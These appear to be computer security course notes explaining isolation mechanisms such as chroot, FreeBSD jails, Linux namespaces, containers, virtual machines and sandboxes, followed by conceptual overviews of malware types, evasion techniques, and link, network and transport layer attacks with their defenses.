Isolation mechanisms like containers, jails, and namespaces provide mechanisms to restrict the damage that a compromised application may do.

chroot and Jailkits

The chroot command changes the root directory for a process and its children, creating an isolated directory hierarchy where they operate. Often called a “chroot jail,” this environment limits the process’s access to other parts of the file system, improving security by restricting the scope of its operations. However, chroot can only be safely executed by the root user, as it requires elevated privileges to create a secure environment. Without root permissions, it is easy for an ordinary user to use the jail to access an alternate password file to gain root privileges and escape the chroot jail, potentially compromising system security.

A jailkit helps manage chroot environments by providing tools to set up and manage these restricted areas more securely. Jailkits automate setting up a controlled environment, simplifying tasks like configuring file permissions, setting up shell access, and ensuring that the jailed process has limited capabilities. Jailkits are particularly useful for web hosting environments or isolated testing spaces, where it is necessary to confine a process within a specified directory.

FreeBSD Jails

The FreeBSD jail mechanism builds on the concept of chroot but introduces additional controls, making it more robust for isolating services. Jails not only restrict file system access but also limit network access, user processes, and the permissions of the root user within the jail. This means that even if a process within the jail gains root privileges, its actions are constrained to the jail environment. FreeBSD jails prevent the root user inside the jail from interfering with the host system, providing a more secure and controlled environment compared to chroot.

Linux Application Isolation

Linux provides several isolation mechanisms to securely manage applications, including namespaces, capabilities, and control groups (cgroups):

  1. Namespaces: Namespaces isolate different aspects of the system environment for processes, giving each process a unique view of system resources:
  • IPC (Inter-Process Communication): Isolates communication between processes, restricting shared memory access.
  • Network: Gives each process its network stack, with separate network interfaces, routing tables, and firewall rules.
  • Mount (File System): Provides isolated file system views, so a process can have its own file hierarchy.
  • PID (Process IDs): Creates isolated process trees, allowing processes to have their own set of process IDs.
  • User/Group IDs: Allows for mapping of user IDs within namespaces, enabling processes to have different user IDs from the host.
  • Network Name: Offers independent host and domain names in each namespace.
  1. Capabilities: Linux capabilities break down root privileges into smaller units, allowing processes to execute specific privileged operations without full root access. For example, a process can have network control or file modification privileges without full system control, improving security by reducing the risk of abuse if the process is compromised. Capabilities allow an administrator to grant a process specific elevated privileges, regardless of what user ID that process runs under. Even if it runs as root (user ID 0), it can still have a limited ability to run privileged operations.

  2. Control Groups (cgroups): Cgroups manage resource allocation for processes, limiting CPU, memory, file I/O, and network I/O usage. This prevents processes from monopolizing resources, maintaining system stability and performance.

Containers

Containers are lightweight environments that package an application and its dependencies into isolated user spaces, leveraging namespaces, cgroups, and capabilities for security. This approach allows each container to operate independently on a shared OS, with controlled access to system resources.

Containers separate policy from enforcement by abstracting the application environment, reducing comprehension errors by simplifying dependency management. Unlike virtual machines (VMs), containers share the host OS kernel, making them faster and more resource-efficient since they do not require a full OS for each instance.

Key Components of Containers

  • Namespaces: Isolate processes within their own environments.
  • Cgroups: Control resource allocation to prevent resource overuse.
  • Capabilities: Limit privileged operations, reducing security risks.
  • Copy-on-Write File System: Allows containers to share a base file system while adding unique changes, saving space and improving efficiency.

While containers and virtual machines (VMs) both provide isolation, they differ fundamentally. Containers share the host OS kernel, making them more lightweight and faster to deploy. VMs, in contrast, emulate entire systems, including a separate OS, which consumes more resources but provides stronger isolation due to the OS-level separation.

Despite their benefits, containers can introduce security risks. For example, shared kernel vulnerabilities may allow a compromised container to impact the host. Furthermore, misconfigured capabilities or insecure default settings can lead to privilege escalation attacks. Using up-to-date container images and adhering to strict privilege management can help mitigate these risks.

Virtual Machines

As a general concept, virtualization is the addition of a layer of abstraction to physical devices. With virtual memory, for example, a process has the impression that it owns the entire memory address space. Different processes can all access the same virtual memory location and the memory management unit (MMU) on the processor maps each access to the unique physical memory locations that are assigned to the process.

Process virtual machines present a virtual CPU that allows programs to execute on a processor that does not physically exist. The instructions are interpreted by a program that simulates the architecture of the pseudo machine. Early pseudo-machines included o-code for BCPL and P-code for Pascal. The most popular pseudo-machine today is the Java Virtual Machine (JVM). This simulated hardware does not even pretend to access the underlying system at a hardware level. Process virtual machines will often allow “special” calls to invoke system functions or provide a simulation of some generic hardware platform.

Operating system virtualization is provided by containers, where a group of processes is presented with the illusion of running on a separate operating system but, in reality, shares the operating system with other groups of processes – they are just not visible to the processes in the container.

System virtual machines*, allow a physical computer to act like several real machines, with each machine running its own operating system (on a virtual machine) and applications that interact with that operating system. The key to this machine virtualization is not to allow each operating system to have direct access to certain privileged instructions in the processor. These instructions would allow an operating system to directly access I/O ports, MMU settings, the task register, the halt instruction, and other parts of the processor that could interfere with the processor’s behavior and with the other operating systems on the system. Instead, a trap and emulate approach is used. Privileged instructions, as well as system interrupts, are caught by the Virtual Machine Monitor (VMM), also known as a hypervisor. The hypervisor arbitrates access to physical resources and presents a set of virtual device interfaces to each guest operating system (including the memory management unit, I/O ports, disks, and network interfaces). The hypervisor also handles preemption. Just as an operating system may suspend a process to allow another process to run, the hypervisor will suspend an operating system to give other operating systems a chance to run.

The two configurations of virtual machines are hosted virtual machines and native virtual machines. With a hosted virtual machine (also called a type 2 hypervisor), the computer has a primary operating system installed that has access to the raw machine (all devices, memory, and file system). This host operating system does not run in a virtual environment. One or more guest operating systems can then be run on virtual machines. The VMM serves as a proxy, converting requests from the virtual machine into operations that get sent to and executed on the host operating system. A native virtual machine (also called a type 1 hypervisor) is one where there is no “primary” operating system that owns the system hardware. The hypervisor is in charge of access to the devices and provides each operating system drivers for an abstract view of all the devices.

Security implications

Virtual machines (VMs) provide a deep layer of isolation, encapsulating the operating system along with all the applications it runs and files it needs within a secure environment separate from the physical hardware. Unlike lighter confinement methods like containers, a VM-contained compromise affects only that VM, akin to a contained issue in a physical machine.

Despite this isolation, VMs can still pose risks if compromised. Malicious entities can exploit VMs to attempt attacks on other systems within the same physical environment, leveraging the shared physical resources. Such scenarios underscore potential vulnerabilities in even well-isolated environments, highlighting the need for vigilant security practices across all layers.

A specific threat in such environments is the creation of covert channels through side channel attacks. These channels exploit system behaviors like CPU load variations to clandestinely transmit information between VMs clandestinely, bypassing conventional communication restrictions. This technique reveals how attackers can bridge gaps between highly secure and less secure systems, manipulating physical resource signals to communicate stealthily.

Application Sandboxing

Application sandboxing provides a restricted environment to safely execute potentially harmful software, minimizing system-wide risks. It restricts program operations based on predefined rules, allowing only certain actions within the system.

This mechanism is crucial for running applications from unknown sources and is also extensively used by security researchers to monitor software behavior and detect malware. Sandboxes enforce restrictions on file access, network usage, and other system interactions, offering a fundamental layer of security by controlling application capabilities in a more fine-grained manner than traditional methods like containers or jails.

While mechanisms like jails and containers, which include namespaces, control groups, and capabilities, are great for creating an environment to run services without the overhead of deploying virtual machines, they do not fully address the ability to restrict what normal applications can do.

We want to protect users from their applications: give users the ability to run apps but restrict what those apps can do on a per-app basis, such as opening files only with a certain name or permitting only TCP networking.

Sandboxing is currently supported on a wide variety of platforms at either the kernel or application level. We’ll examine three ways in which they can be built.

1. Application sandboxing via system call interposition & user-level validation

An example of a user-level sandbox is the Janus sandbox. Application sandboxing with Janus involves creating policies to define permissible system calls for each application. Janus uses a kernel module to intercept these calls and sends them to a user-level monitor program that decides whether to allow or block the call based on the configured policy file. Challenges include maintaining system state across processes and handling complex scenarios like network and file operations, pathname parsing, and potential race conditions (TOCTTOU issues).

2. Application sandboxing with integrated OS support

The better alternative to having a user-level process decide on whether to permit system calls is to incorporate policy validation in the kernel. Some operating systems provide kernel support for sandboxing. These include the Android Application Sandbox, the iOS App Sandbox, the macOS sandbox, and AppArmor on Linux. Microsoft introduced the Windows Sandbox in December 2018, but this functions far more like a container than a traditional application sandbox, giving the process an isolated execution environment.

Seccomp-BPF (SECure COMPuting with Berkeley Packet Filters) is a Linux security framework that enables limits on which system calls a process can execute. It uses the Berkeley Packet Filter to evaluate system calls as “packets,” and applying rules that govern their execution. Though it doesn’t provide complete isolation on its own, Seccomp is an essential component for constructing robust application sandboxes when combined with other mechanisms like namespaces and control groups.

3. Process virtual machine sandboxes: Java

The Java Virtual Machine (JVM) was designed to run compiled Java applications in a controlled manner on any system regardless of the operating system or hardware architecture. The JVM employs three main components to ensure security:

  1. Bytecode Verifier: It scrutinizes Java bytecode before execution to confirm it adheres strictly to Java’s standards without security breaches like bypassing access controls or array bounds.

  2. Class Loader: This component safeguards against the loading of untrusted classes and ensures the integrity of runtime environments through Address Space Layout Randomization (ASLR), maintaining the security of essential class libraries.

  3. Security Manager: This enforces protection domains that define permissible actions within the JVM. It intercepts calls to sensitive methods, verifying permissions against a security policy, which can restrict actions like file and network access, preventing operations not allowed by the policy.

Building an effective sandbox in Java has proven complex, highlighted by persistent bugs, especially in the underlying C libraries and across different JVM implementations. Moreover, Java’s allowance for native methods can bypass these security mechanisms, introducing potential risks.

Malware

Malware is software intentionally designed to cause harm to computers, networks, or users. It can steal data, damage systems, hijack devices, or spy on users. Common forms of malware include viruses, worms, Trojans, ransomware, spyware, adware, and rootkits. Malware typically operates without the user’s knowledge and may enter systems through vulnerabilities, social engineering, or compromised hardware.

Worms and Viruses

Understanding the distinction between worms and viruses helps clarify how malware spreads and how defenses must respond. Although both are self-replicating, they follow fundamentally different mechanisms for propagation. Worms spread autonomously by exploiting network vulnerabilities, requiring no user interaction. Viruses, in contrast, rely on user actions and attach themselves to legitimate files or programs, spreading only when these files are executed.

Core Components of Malware

Malware is often structured into functional stages that reflect its life cycle inside a target system. By breaking down these components, we can better understand how malware infiltrates, persists, communicates, and executes its objectives. Malware is often built as a multi-stage system. Each stage plays a role in enabling, maintaining, and concealing the attack.

Delivery (initial access)
Malware reaches a system via email attachments, malicious websites, infected USB drives, or software exploits. This is the point of initial access.
Installation (persistence)
To persist on the system, malware may alter startup settings, inject itself into running processes, or manipulate the registry.
Command and Control (C2)
Many malware families connect to external servers to receive instructions, send stolen data, or download updates.
Payload Execution
The payload is the malicious task executed by the malware, such as stealing data, logging keystrokes, or encrypting files.
Triggers
Malware may lie dormant until activated by a condition, such as a time, command, or system event, to avoid detection.

Exploiting Vulnerabilities

One powerful technique malware uses to gain control is exploiting software or configuration vulnerabilities. These weaknesses in software or hardware allow attackers to bypass security mechanisms and execute unauthorized code.

Zero-Day Exploits

Zero-day exploits target vulnerabilities that are unknown to the software vendor and have not yet been patched. Because no fix exists, these exploits are highly valuable and effective, especially for attackers who want to maintain stealth. Zero-day vulnerabilities are often discovered by security researchers, criminal organizations, or state-sponsored actors. They may be sold on black markets or used in targeted attacks before being disclosed. Once a zero-day is made public or used in a widespread attack, defenders have zero days to respond – hence the name. These exploits often form the initial step in sophisticated malware campaigns, especially against high-value targets.

N-Day Exploits

N-day exploits take advantage of known vulnerabilities for which patches have already been released. The term “N-day” refers to the number of days since the vulnerability was disclosed. Although a fix is available, many systems remain unpatched due to delays in updates, system compatibility concerns, or neglect. Attackers scan for these exposed systems and exploit them using publicly available tools or reverse-engineered patch information. N-day exploits are a common part of broad-based malware campaigns, since they allow attackers to compromise large numbers of systems with relatively low effort.

Zero-Click Exploits

These require no user interaction. Simply receiving a message or file can trigger the attack, often in messaging apps or file viewers.

Malware Activities

Once malware gains a foothold, it can perform various actions depending on its design and purpose. These activities may be stealthy or destructive, short-lived or persistent, targeted or indiscriminate.

Exfiltration
Malware may steal documents, credentials, emails, or other sensitive data and transmit them to an attacker.
Surveillance
Spyware records browsing, typing, communication, and sometimes webcam or microphone input.
Keylogging
Keyloggers capture user input to steal passwords and sensitive information.
Ransomware
Ransomware encrypts data or locks devices, demanding payment for restoration. Some variants also steal data.
Data Wiping
Wipers destroy data, rendering recovery impossible. Often used for sabotage.
Adware
Adware floods the user with advertisements and may track user behavior for profit.
Resource Abuse
Malware may use system resources for unauthorized purposes, such as cryptomining or participating in botnets.
Remote Control Remote Access Trojans (RATs) enable attackers to manipulate the system, install further malware, and monitor users.

Infiltration Techniques

Malware must first gain access to a target system. This section examines the diverse tactics attackers use to deliver and activate malware on unsuspecting victims’ devices. Malware must first gain access to the system. Techniques include exploiting flaws or deceiving users.

File Infector Viruses

File infector viruses attach themselves to executable files such as .exe, .com, or .dll files. When the infected file is run, the virus executes first, often launching the legitimate program afterward to avoid detection. These viruses can replicate by infecting other executable files on the system or shared drives. Some variants spread across network shares or removable media, embedding themselves into system files. File infector viruses may be destructive, corrupting or deleting files, or stealthy, silently spreading and delivering payloads such as spyware or ransomware. Because they modify existing programs, they can be difficult to detect without hashing or integrity-checking mechanisms.

Infected Flash Drives

Infected USB drives are a practical and dangerous malware delivery method, especially in environments with limited network exposure. On older Windows systems, attackers exploited AutoRun to automatically launch malware upon insertion. More sophisticated attacks modify the firmware of the USB device itself—a technique known as BadUSB. In this scenario, the device impersonates a keyboard and types malicious commands as soon as it’s plugged in, bypassing traditional security. USB drop attacks rely on human curiosity; attackers leave compromised drives in public places, hoping a target will plug one in. These drives may contain enticing filenames or documents (e.g., labeled as financial reports or photos), which activate malware when opened. Even when not infected, USB drives can cause data leakage if they contain sensitive files and are accessed by unauthorized users.

Code Exploits

Buffer overflows, command injection, and other software flaws allow attackers to run code without authorization.

Compromised Tools and Firmware

Malicious compilers or modified firmware can inject backdoors during compilation or device use. Ken Thompson’s Reflections on Trusting Trust reminds us that tools like compilers can be modified to enable undetectable backdoors even in secure-looking software.

Social Engineering

Attackers often bypass technical defenses by targeting the human element. Social engineering is the practice of manipulating people into performing actions that compromise security, such as installing malware or revealing sensitive information. These techniques are often delivered through familiar interfaces, such as emails, websites, pop-ups, and text messages – and rely on urgency, curiosity, fear, or trust to deceive users. Users may be tricked into installing malware through misleading emails, fake software, or deceptive prompts.

Credential Stuffing

Attackers reuse leaked credentials to gain access to other systems where users have reused passwords.

Supply Chain Attacks

Malware can be inserted during software development or distribution. This includes tampered installers, compromised libraries, or poisoned updates. Examples include the SolarWinds breach and the 2024 xz Utils backdoor.

Macro Viruses

These are embedded in documents using scripting languages like VBA (Visual Basic for Applications) or embedded JavaScript in PDF documents. Users are often tricked into enabling macros, which can lead to infection and replication across files.

Where Malware Resides

After infiltration, malware must remain accessible and persistent. It embeds itself in different parts of the system, often choosing locations that are hard to inspect or clean. Malware hides in many layers of the system to maintain access and evade detection.

Boot Sector and Bootloader

Bootkits infect the system before the OS loads, making removal difficult.

Backdoors

Backdoors are covert access points that bypass normal authentication mechanisms, granting attackers unauthorized entry into a system. They may be introduced during software development, inserted by insiders, or installed post-compromise by malware. Once in place, backdoors allow attackers to return to the system without re-exploiting vulnerabilities. They can be implemented as hardcoded credentials, hidden administrative tools, or malware components that listen for specific commands. Backdoors are often difficult to detect because they blend in with legitimate software or remain dormant until triggered.

Remote Access Trojans (RATs)

Remote Access Trojans (RATs) are a class of malware designed to provide attackers with complete remote control over an infected system. Once a RAT is installed, the attacker can access files, monitor user activity, use the webcam or microphone, capture keystrokes, and deploy additional malware. RATs are typically delivered via phishing emails, trojanized software, or drive-by downloads. They often include features to hide from detection, such as encryption, polymorphism, and rootkit components. RATs are especially dangerous because they give attackers persistent and interactive access, enabling long-term surveillance or sabotage.

Rootkits

Rootkits are stealthy software components designed to conceal the presence of malware by altering how the operating system functions. They may hide files, processes, registry entries, or network activity associated with the malicious software. Rootkits can operate in user mode, affecting high-level OS utilities, or in kernel mode, modifying core operating system behavior. Hypervisor rootkits go even deeper, running below the OS to gain complete control over the system while remaining nearly invisible. Because rootkits interfere directly with system operations, they are difficult to detect and remove, often requiring specialized forensic tools or complete system reinstallation.

Fileless Malware

Fileless malware operates from memory or the registry, avoiding disk writes and evading traditional antivirus detection.

Social Engineering

Attackers often bypass technical defenses by targeting the human element. Social engineering is the practice of manipulating people into performing actions that compromise security, such as installing malware or revealing sensitive information. These techniques are often delivered through familiar interfaces—emails, websites, pop-ups, text messages—and rely on urgency, curiosity, fear, or trust to deceive users.

Trojans

‘Trojan’ is short for ‘Trojan Horse,’ referring to the ancient tale where attackers hid inside a giant horse, which was presented as a seemingly harmless gift. In computing, a Trojan horse is a malicious program disguised as legitimate software, intended to deceive the user into installing it.

The user is tricked into downloading and installing the Trojan, believing it serves a beneficial function. Once installed, the Trojan silently executes harmful actions, such as installing spyware, opening backdoors, or granting remote access. Trojans may appear as system utilities, games, updates, or cracked software. Some are embedded within seemingly legitimate downloads from file-sharing sites or phishing emails, and others are bundled with fake security tools.

Phishing

Phishing is a form of fraud that uses deceptive communication, usually email, to trick users into taking unsafe actions, such as clicking on malicious links or providing login credentials. These messages often impersonate legitimate sources like banks, cloud services, or internal IT teams. While generic phishing messages are broadly distributed, more advanced forms include spear phishing and smishing.

Spear phishing targets a specific individual or organization using personalized information to appear credible. For example, a message may reference a project the user is working on or appear to come from a trusted colleague. This makes it far more convincing and harder to detect.

Smishing is phishing delivered through SMS or messaging apps. Victims may receive urgent texts claiming to be from a bank, delivery service, or administrator, prompting them to click a malicious link or enter credentials on a spoofed site. These attacks are especially dangerous on mobile devices, where it is harder to verify links or sender identities.

Deceptive Pop-Ups

Fake alerts trick users into running code or downloading files.

Malicious websites may look legitimate or use typosquatting to deceive users. Masked links also hide the true destination.

QR Code Attacks

Malicious QR codes can link to phishing pages or trigger unintended downloads.

Information Gathering Techniques

Some malware is designed to quietly collect sensitive information over time. These techniques allow attackers to monitor systems without drawing attention. Some malware gathers information passively over time.

Keyloggers

Capture user keystrokes to extract sensitive information.

Side-Channel Attacks

Side-channel attacks extract sensitive information by analyzing indirect data produced by a system, such as electromagnetic emissions, power consumption, timing variations, or acoustic signals. Unlike traditional attacks that exploit software vulnerabilities, side-channel attacks take advantage of physical or behavioral characteristics of a system. For example, attackers may observe CPU power fluctuations to infer encryption keys, or use variations in typing sounds to reconstruct text input. These attacks are especially dangerous in high-security environments where systems are otherwise locked down.

Side-channel techniques can be embedded in malicious software to quietly exfiltrate data over non-traditional channels. For instance, malware might encode data in blinking LEDs, fan speed fluctuations, or even inaudible sound signals. Because these channels fall outside typical monitoring systems, side-channel attacks are hard to detect and often go unnoticed. They are especially useful in air-gapped environments (systems not connected to external networks), where conventional data exfiltration via networks is not possible.

Botnets and Control

Some malware converts infected systems into remotely controlled bots. Coordinated botnets can perform large-scale operations and are often managed via command-and-control (C2) infrastructure.

A bot is an infected device under an attacker’s control. Botnets consist of many bots coordinated to perform large-scale actions like DDoS attacks, spamming, or mining cryptocurrency. Bots receive commands via C2 infrastructure.

Defending Against Malware

Effective malware defense involves a combination of prevention, detection, and response. This section outlines several strategies that reduce the risk and impact of infections. Protection requires layered defenses combining technical controls and user awareness.

File and Access Control

Restrict what users and programs can access. Use Mandatory Access Control (MAC) and the principle of least privilege.

User Warnings

Warnings before running unknown content help prevent accidental execution of malware. Training helps users interpret and respond appropriately.

Anti-Malware Technologies

Anti-malware technologies use a combination of static and dynamic techniques to detect and block malicious software.

Signature-based scanning is one of the most traditional and widely used methods. It involves scanning files for known byte patterns that uniquely identify malware. This technique is fast and effective against previously identified threats, but cannot detect new or modified malware that lacks a known signature.

Heuristic analysis uses rules and pattern recognition to identify suspicious behaviors or characteristics common to malware, even if the code itself is unknown. Static heuristics examine code structure without executing it, while behavioral analysis, or dynamic heuristics, monitors how a file acts when executed. Behavioral analysis can detect malware that tries to evade static scanning by observing actions like unusual file access, system changes, or network communication. These techniques are especially useful for detecting zero-day threats or polymorphic malware that changes its appearance to avoid signature detection.

System Hardening

Removing administrative rights, isolating risky applications, and using containerization limit malware impact.

Malware Evasion Strategies

Modern malware uses evasion techniques to bypass defenses and remain undetected. These strategies range from encryption and obfuscation to conditional execution and stealthy communication.

Encryption

Malware may encrypt its contents to avoid detection by signature scanners.

Packing

Packing is a technique used to obfuscate malware by compressing or encrypting the code so that its true nature is hidden from signature-based scanners. The packed executable contains a small stub program that decompresses or decrypts the original malicious code in memory at runtime. Packers are commonly used by malware authors to make reverse engineering and analysis more difficult. Many commercial packers are legitimate tools used for software protection, but they are frequently abused in malware distribution. Security tools must often unpack the file or emulate its execution to detect the real payload.

Polymorphism

Polymorphic malware modifies its own code with each infection, creating unique signatures while preserving functionality. This is typically achieved through code obfuscation, encryption with variable keys, or insertion of junk instructions that don’t change the algorithm (such as no-ops). The mutation occurs every time the malware replicates or installs itself, making it difficult for traditional signature-based detection tools to identify. Some polymorphic engines are highly advanced, capable of generating millions of variants. This ability to change appearance while maintaining behavior is especially effective at evading static detection mechanisms.

Delayed Execution

Some malware delays its execution until certain conditions are met, such as the passage of time, detection of specific user behavior, or receipt of a remote command. This strategy helps avoid detection during automated sandbox analysis, which typically only observes programs for a short duration. Delayed execution allows the malware to remain dormant until it is less likely to be analyzed or intercepted.

Many advanced malware variants also include checks to determine whether they are running in a virtual machine or sandboxed environment, which are commonly used by security researchers. These checks might involve detecting the presence of analysis tools, unusual hardware configurations, or short uptimes. If such an environment is detected, the malware may choose to disable itself, exit quietly, or exhibit benign behavior to avoid exposure. By withholding its malicious behavior until it confirms it is on a real user system, the malware greatly reduces its chance of detection during early stages of analysis.

Covert Channels

Covert channels are unconventional methods used by malware to communicate or exfiltrate data in ways that bypass standard security monitoring tools. These channels are not designed for data transmission and often repurpose benign or obscure system features. One common example is DNS tunneling, where malware encodes data into DNS queries or responses to covertly send or receive information from a command-and-control server. Because DNS is a fundamental service that is rarely blocked, it offers an effective and persistent communication path.

Other covert channels may involve encoding data in network packet timing, unused header fields, or even through system artifacts such as LED blink patterns, sound, or CPU usage patterns. These methods are particularly useful in environments with tight security controls or where outbound internet access is restricted. By hiding communication within normal system operations, covert channels help malware remain undetected while continuing to exfiltrate sensitive information or receive instructions.

Trusting Trust

Ken Thompson’s essay reminds us that tools like compilers can be malicious, enabling undetectable backdoors even in secure-looking software.

Honeypots

Honeypots are deliberately vulnerable systems used to attract and monitor attackers. They serve as valuable tools for research, detection, and diversion in cybersecurity operations. Honeypots are decoy systems designed to attract attackers. They allow defenders to study attack behavior and delay adversaries while protecting real systems.

Network Security

The Internet is designed to interconnect various networks, each potentially using different hardware and protocols, with the Internet Protocol (IP) providing a logical structure atop these physical networks. IP inherently expects unreliability from underlying networks, delegating the task of packet loss detection and retransmission to higher layers like TCP or applications. Communication via IP involves multiple routers and networks, which may compromise security due to their unknown trust levels.

The OSI model helps describe the networking protocol stacks for IP:

  1. Physical Layer: Involves the actual network hardware.
  2. Data Link Layer: Manages protocols for local networks like Ethernet or Wi-Fi.
  3. Network Layer: Handles logical networking and routing across physical networks via IP.
  4. Transport Layer: Manages logical connections, ensuring reliable data transmission through TCP, or provides simpler, unreliable communication via UDP.

Each layer plays a critical role in ensuring data is transmitted securely and efficiently across the internet.

Data link layer

In Ethernet and Wi-Fi networks, the data link layer governs how devices communicate over a local link. Ethernet uses physical cables and switches, while Wi-Fi uses radio signals and access points. This layer relies on MAC (Media Access Control) addresses for local delivery. Security was not a design priority for the data link layer, making it vulnerable to several attacks. Notably, Wi-Fi includes encryption, but only between the client device and the access point, not end-to-end between communicating hosts.

Switch CAM table overflow

Intercept traffic by forcing the switch to behave like a hub.

Switches maintain a Content Addressable Memory (CAM) table that maps MAC addresses to physical switch ports, enabling efficient packet delivery. A CAM table overflow attack floods the switch with packets from bogus MAC addresses, exceeding the table’s capacity. When the table is full, the switch fails open, broadcasting all frames to all ports. This behavior allows an attacker to passively monitor all traffic on the LAN.

To defend against this, port security features on managed switches can limit the number of allowed MAC addresses per port. Additional countermeasures include enabling 802.1X authentication to restrict access until devices are verified.

VLAN hopping (switch spoofing)

Access traffic across multiple VLANs by impersonating a switch.

Virtual Local Area Networks (VLANs) segment network traffic to improve performance and security. VLAN trunking, using IEEE 802.1Q tagging, allows traffic from multiple VLANs to traverse a single switch-to-switch link. In a VLAN hopping attack, an adversary mimics a switch by initiating a trunk connection. This switch spoofing tricks the real switch into forwarding traffic from all VLANs to the attacker’s device.

Defense involves explicitly configuring trunk ports on managed switches and disabling automatic trunk negotiation on access ports. This ensures only authorized ports carry multi-VLAN traffic.

ARP cache poisoning

Redirect IP packets by changing the IP address to MAC address mapping.

The Address Resolution Protocol (ARP) resolves IP addresses to MAC addresses on a local network. In ARP cache poisoning, an attacker sends forged ARP responses, often unsolicited, to associate their MAC address with another host’s IP. As a result, traffic meant for the victim is misrouted to the attacker, enabling man-in-the-middle interception or denial of service.

Mitigation strategies include:

  • Dynamic ARP Inspection: Validates ARP packets against a trusted DHCP snooping database.
  • Static ARP entries: Hardcode legitimate IP-to-MAC mappings on critical systems, though this is difficult to manage at scale.

DHCP spoofing

Deceive new devices by supplying malicious network settings.

Dynamic Host Configuration Protocol (DHCP) assigns IP addresses and other configuration settings to clients joining a network. In a DHCP spoofing attack, an attacker races to respond faster than the legitimate server, providing rogue settings such as a malicious DNS server or default gateway. This can lead to traffic interception, redirection, or disruption.

To counter this, DHCP snooping is used on managed switches. It classifies ports as trusted or untrusted and allows DHCP responses only from trusted ports. Combined with ARP inspection, this ensures that clients receive configuration only from legitimate sources..

Network (IP) layer

The Internet Protocol (IP) provides packet delivery across interconnected networks. It offers best-effort delivery, meaning it does not guarantee packet reliability, integrity, or delivery order. Packets can be dropped due to router queue overflows or may arrive out of order after taking different routes to their destination.

Source IP address authentication

Anyone can impersonate a sender.

One fundamental weakness in IP is the absence of source IP address authentication. Operating systems expect applications to use their real source IP address, but privileged users can override this using raw sockets. This allows attackers to forge packets that appear to come from another host. Any service that relies on IP address-based authentication, such as access controls or rate limits, can be subverted.

Anonymous denial of service

Use spoofed IP addresses to reflect error responses toward a victim.

Attackers can perform anonymous denial of service (DoS) by sending packets with spoofed source addresses that trigger error messages. For example, if a packet with a low Time-To-Live (TTL) expires en route, routers send ICMP Time Exceeded responses to the (forged) source address. A large-scale attack using many spoofed packets from distributed machines (a botnet) can generate significant traffic aimed at a target, effectively overwhelming it without revealing the attacker’s location.

Routers

Routers are specialized computers that forward packets between networks using routing tables and often dedicated forwarding hardware. Despite their importance, they are frequently neglected in terms of security. Routers may use default credentials, run outdated firmware, or expose administrative interfaces.

Routers are susceptible to many of the same threats as general-purpose computers. DoS attacks, such as floods of ICMP packets, can overwhelm routing functions. Improper input handling may lead to crashes or corruption from malformed packets.

More critically, attackers can manipulate routing paths through route table poisoning, either by compromising the router itself or injecting forged route advertisements if routing protocols lack authentication.

Transport layer (UDP, TCP)

Transport layer protocols enable applications to exchange data across networks using port numbers (16-bit values independent of Ethernet switch ports) to identify application endpoints.

UDP

The User Datagram Protocol (UDP) is connectionless and does not maintain state between packets. It offers no guarantee of delivery, ordering, or authenticity. Like IP, it is susceptible to spoofing, making it a common vector for reflection attacks and simple DoS techniques.

TCP

The Transmission Control Protocol (TCP) provides reliable, ordered, and connection-oriented communication. TCP uses sequence numbers to track data and ensure integrity. Connections are established via a three-way handshake:

  1. The client sends a SYN packet with a random initial sequence number.
  2. The server replies with a SYN-ACK, acknowledging the client’s sequence number and providing its own.
  3. The client responds with an ACK, completing the handshake and beginning data transfer.

To mitigate spoofing and hijacking, TCP uses random initial sequence numbers, making it harder for attackers to guess valid sequence numbers and inject forged packets.

SYN flooding

In a SYN flooding attack, an attacker sends many SYN packets but never completes the handshake. The server allocates resources for each half-open connection, eventually exhausting its capacity.

To defend against this, servers use SYN cookies: instead of storing state, the server encodes necessary connection information into the initial sequence number. When the client replies with an ACK, the server validates the cookie before allocating resources, protecting against resource exhaustion.

TCP Reset

Attackers can forcibly terminate a TCP session by injecting a forged RST (reset) segment. If the sequence number in the forged packet is close to the expected value, the receiving host may accept it and tear down the connection.

While the theoretical chance of guessing the exact 32-bit sequence number is extremely low (1 in 232), many systems tolerate a window of acceptable sequence numbers to accommodate out-of-order packets. Attackers can exploit this by flooding the target with RST packets using sequence numbers that fall within this range. If successful, the connection is prematurely closed, disrupting communication.

Routing Protocols

The Internet is composed of many independently operated networks known as Autonomous Systems (AS). Each AS manages a group of IP addresses and uses internal routing protocols to move traffic within its domain. To route traffic between autonomous systems, the Internet relies on the Border Gateway Protocol (BGP). BGP enables external routers at each AS to exchange reachability information and determine the best path for forwarding packets across the global network. It is fundamental to Internet routing but was designed with minimal built-in security, relying heavily on trust among network operators (and there are over 82,000 active ones).

BGP Hijacking

BGP hijacking (or route hijacking) occurs when a network falsely claims ownership of IP prefixes it does not control, misleading other networks into routing traffic through the attacker’s system. This allows for traffic interception, man-in-the-middle attacks, packet inspection, or denial of service.

There are two common subtypes of BGP hijacking:

BGP Path Forgery: The attacker manipulates the AS path in BGP advertisements to appear as a legitimate route. Because BGP lacks path validation, other networks may accept these announcements and route traffic through the attacker’s AS.

BGP Prefix Forgery: The attacker advertises a more specific prefix (e.g., a /24 instead of a legitimate /22). BGP prioritizes more specific routes, so this method effectively diverts traffic to the attacker, even if the destination address is legitimately owned by another AS.

Both methods exploit BGP’s design, which assumes honest cooperation among participants and lacks cryptographic verification of routing announcements.

Defending Against BGP Hijacking

To address these vulnerabilities, two major security enhancements have been proposed:

RPKI (Resource Public Key Infrastructure): RPKI allows IP address holders to cryptographically sign Route Origin Authorizations (ROAs) that specify which AS is permitted to announce specific prefixes. Routers can validate BGP announcements against these signed ROAs to reject forged origin claims. However, RPKI adoption remains incomplete, and misconfigured ROAs can unintentionally block valid traffic.

BGPsec: BGPsec extends BGP by enabling cryptographic validation of the entire AS path. Each AS adds a digital signature to the routing update, allowing downstream routers to verify the path’s integrity. While BGPsec significantly improves security, it introduces high computational overhead and requires all participating ASes to adopt the protocol for full effectiveness. Adoption has been slow due to the complexity of implementation and compatibility concerns.

Domain Name System (DNS)

The Domain Name System (DNS) is a hierarchical service that maps human-readable domain names (like example.com) to IP addresses. It is fundamental to the operation of the Internet, as most services rely on name-based addressing.

Each device typically runs a DNS stub resolver, which performs lookups as follows:

  1. It first checks a local file (e.g., hosts) for predefined mappings.
  2. Then it checks its local DNS cache.
  3. If no match is found, it sends a query to an external resolver, typically provided by an ISP or a public DNS service like Google Public DNS or OpenDNS.

DNS is inherently trusted: applications, including web browsers, rely on DNS for enforcing the same-origin policy, which governs what content can be shared between web pages. However, standard DNS uses UDP, with no built-in authentication or integrity. The only validation is a Query ID (QID) field used to match responses to queries. Because DNS queries and responses are unauthenticated, they can be intercepted, modified, or spoofed.

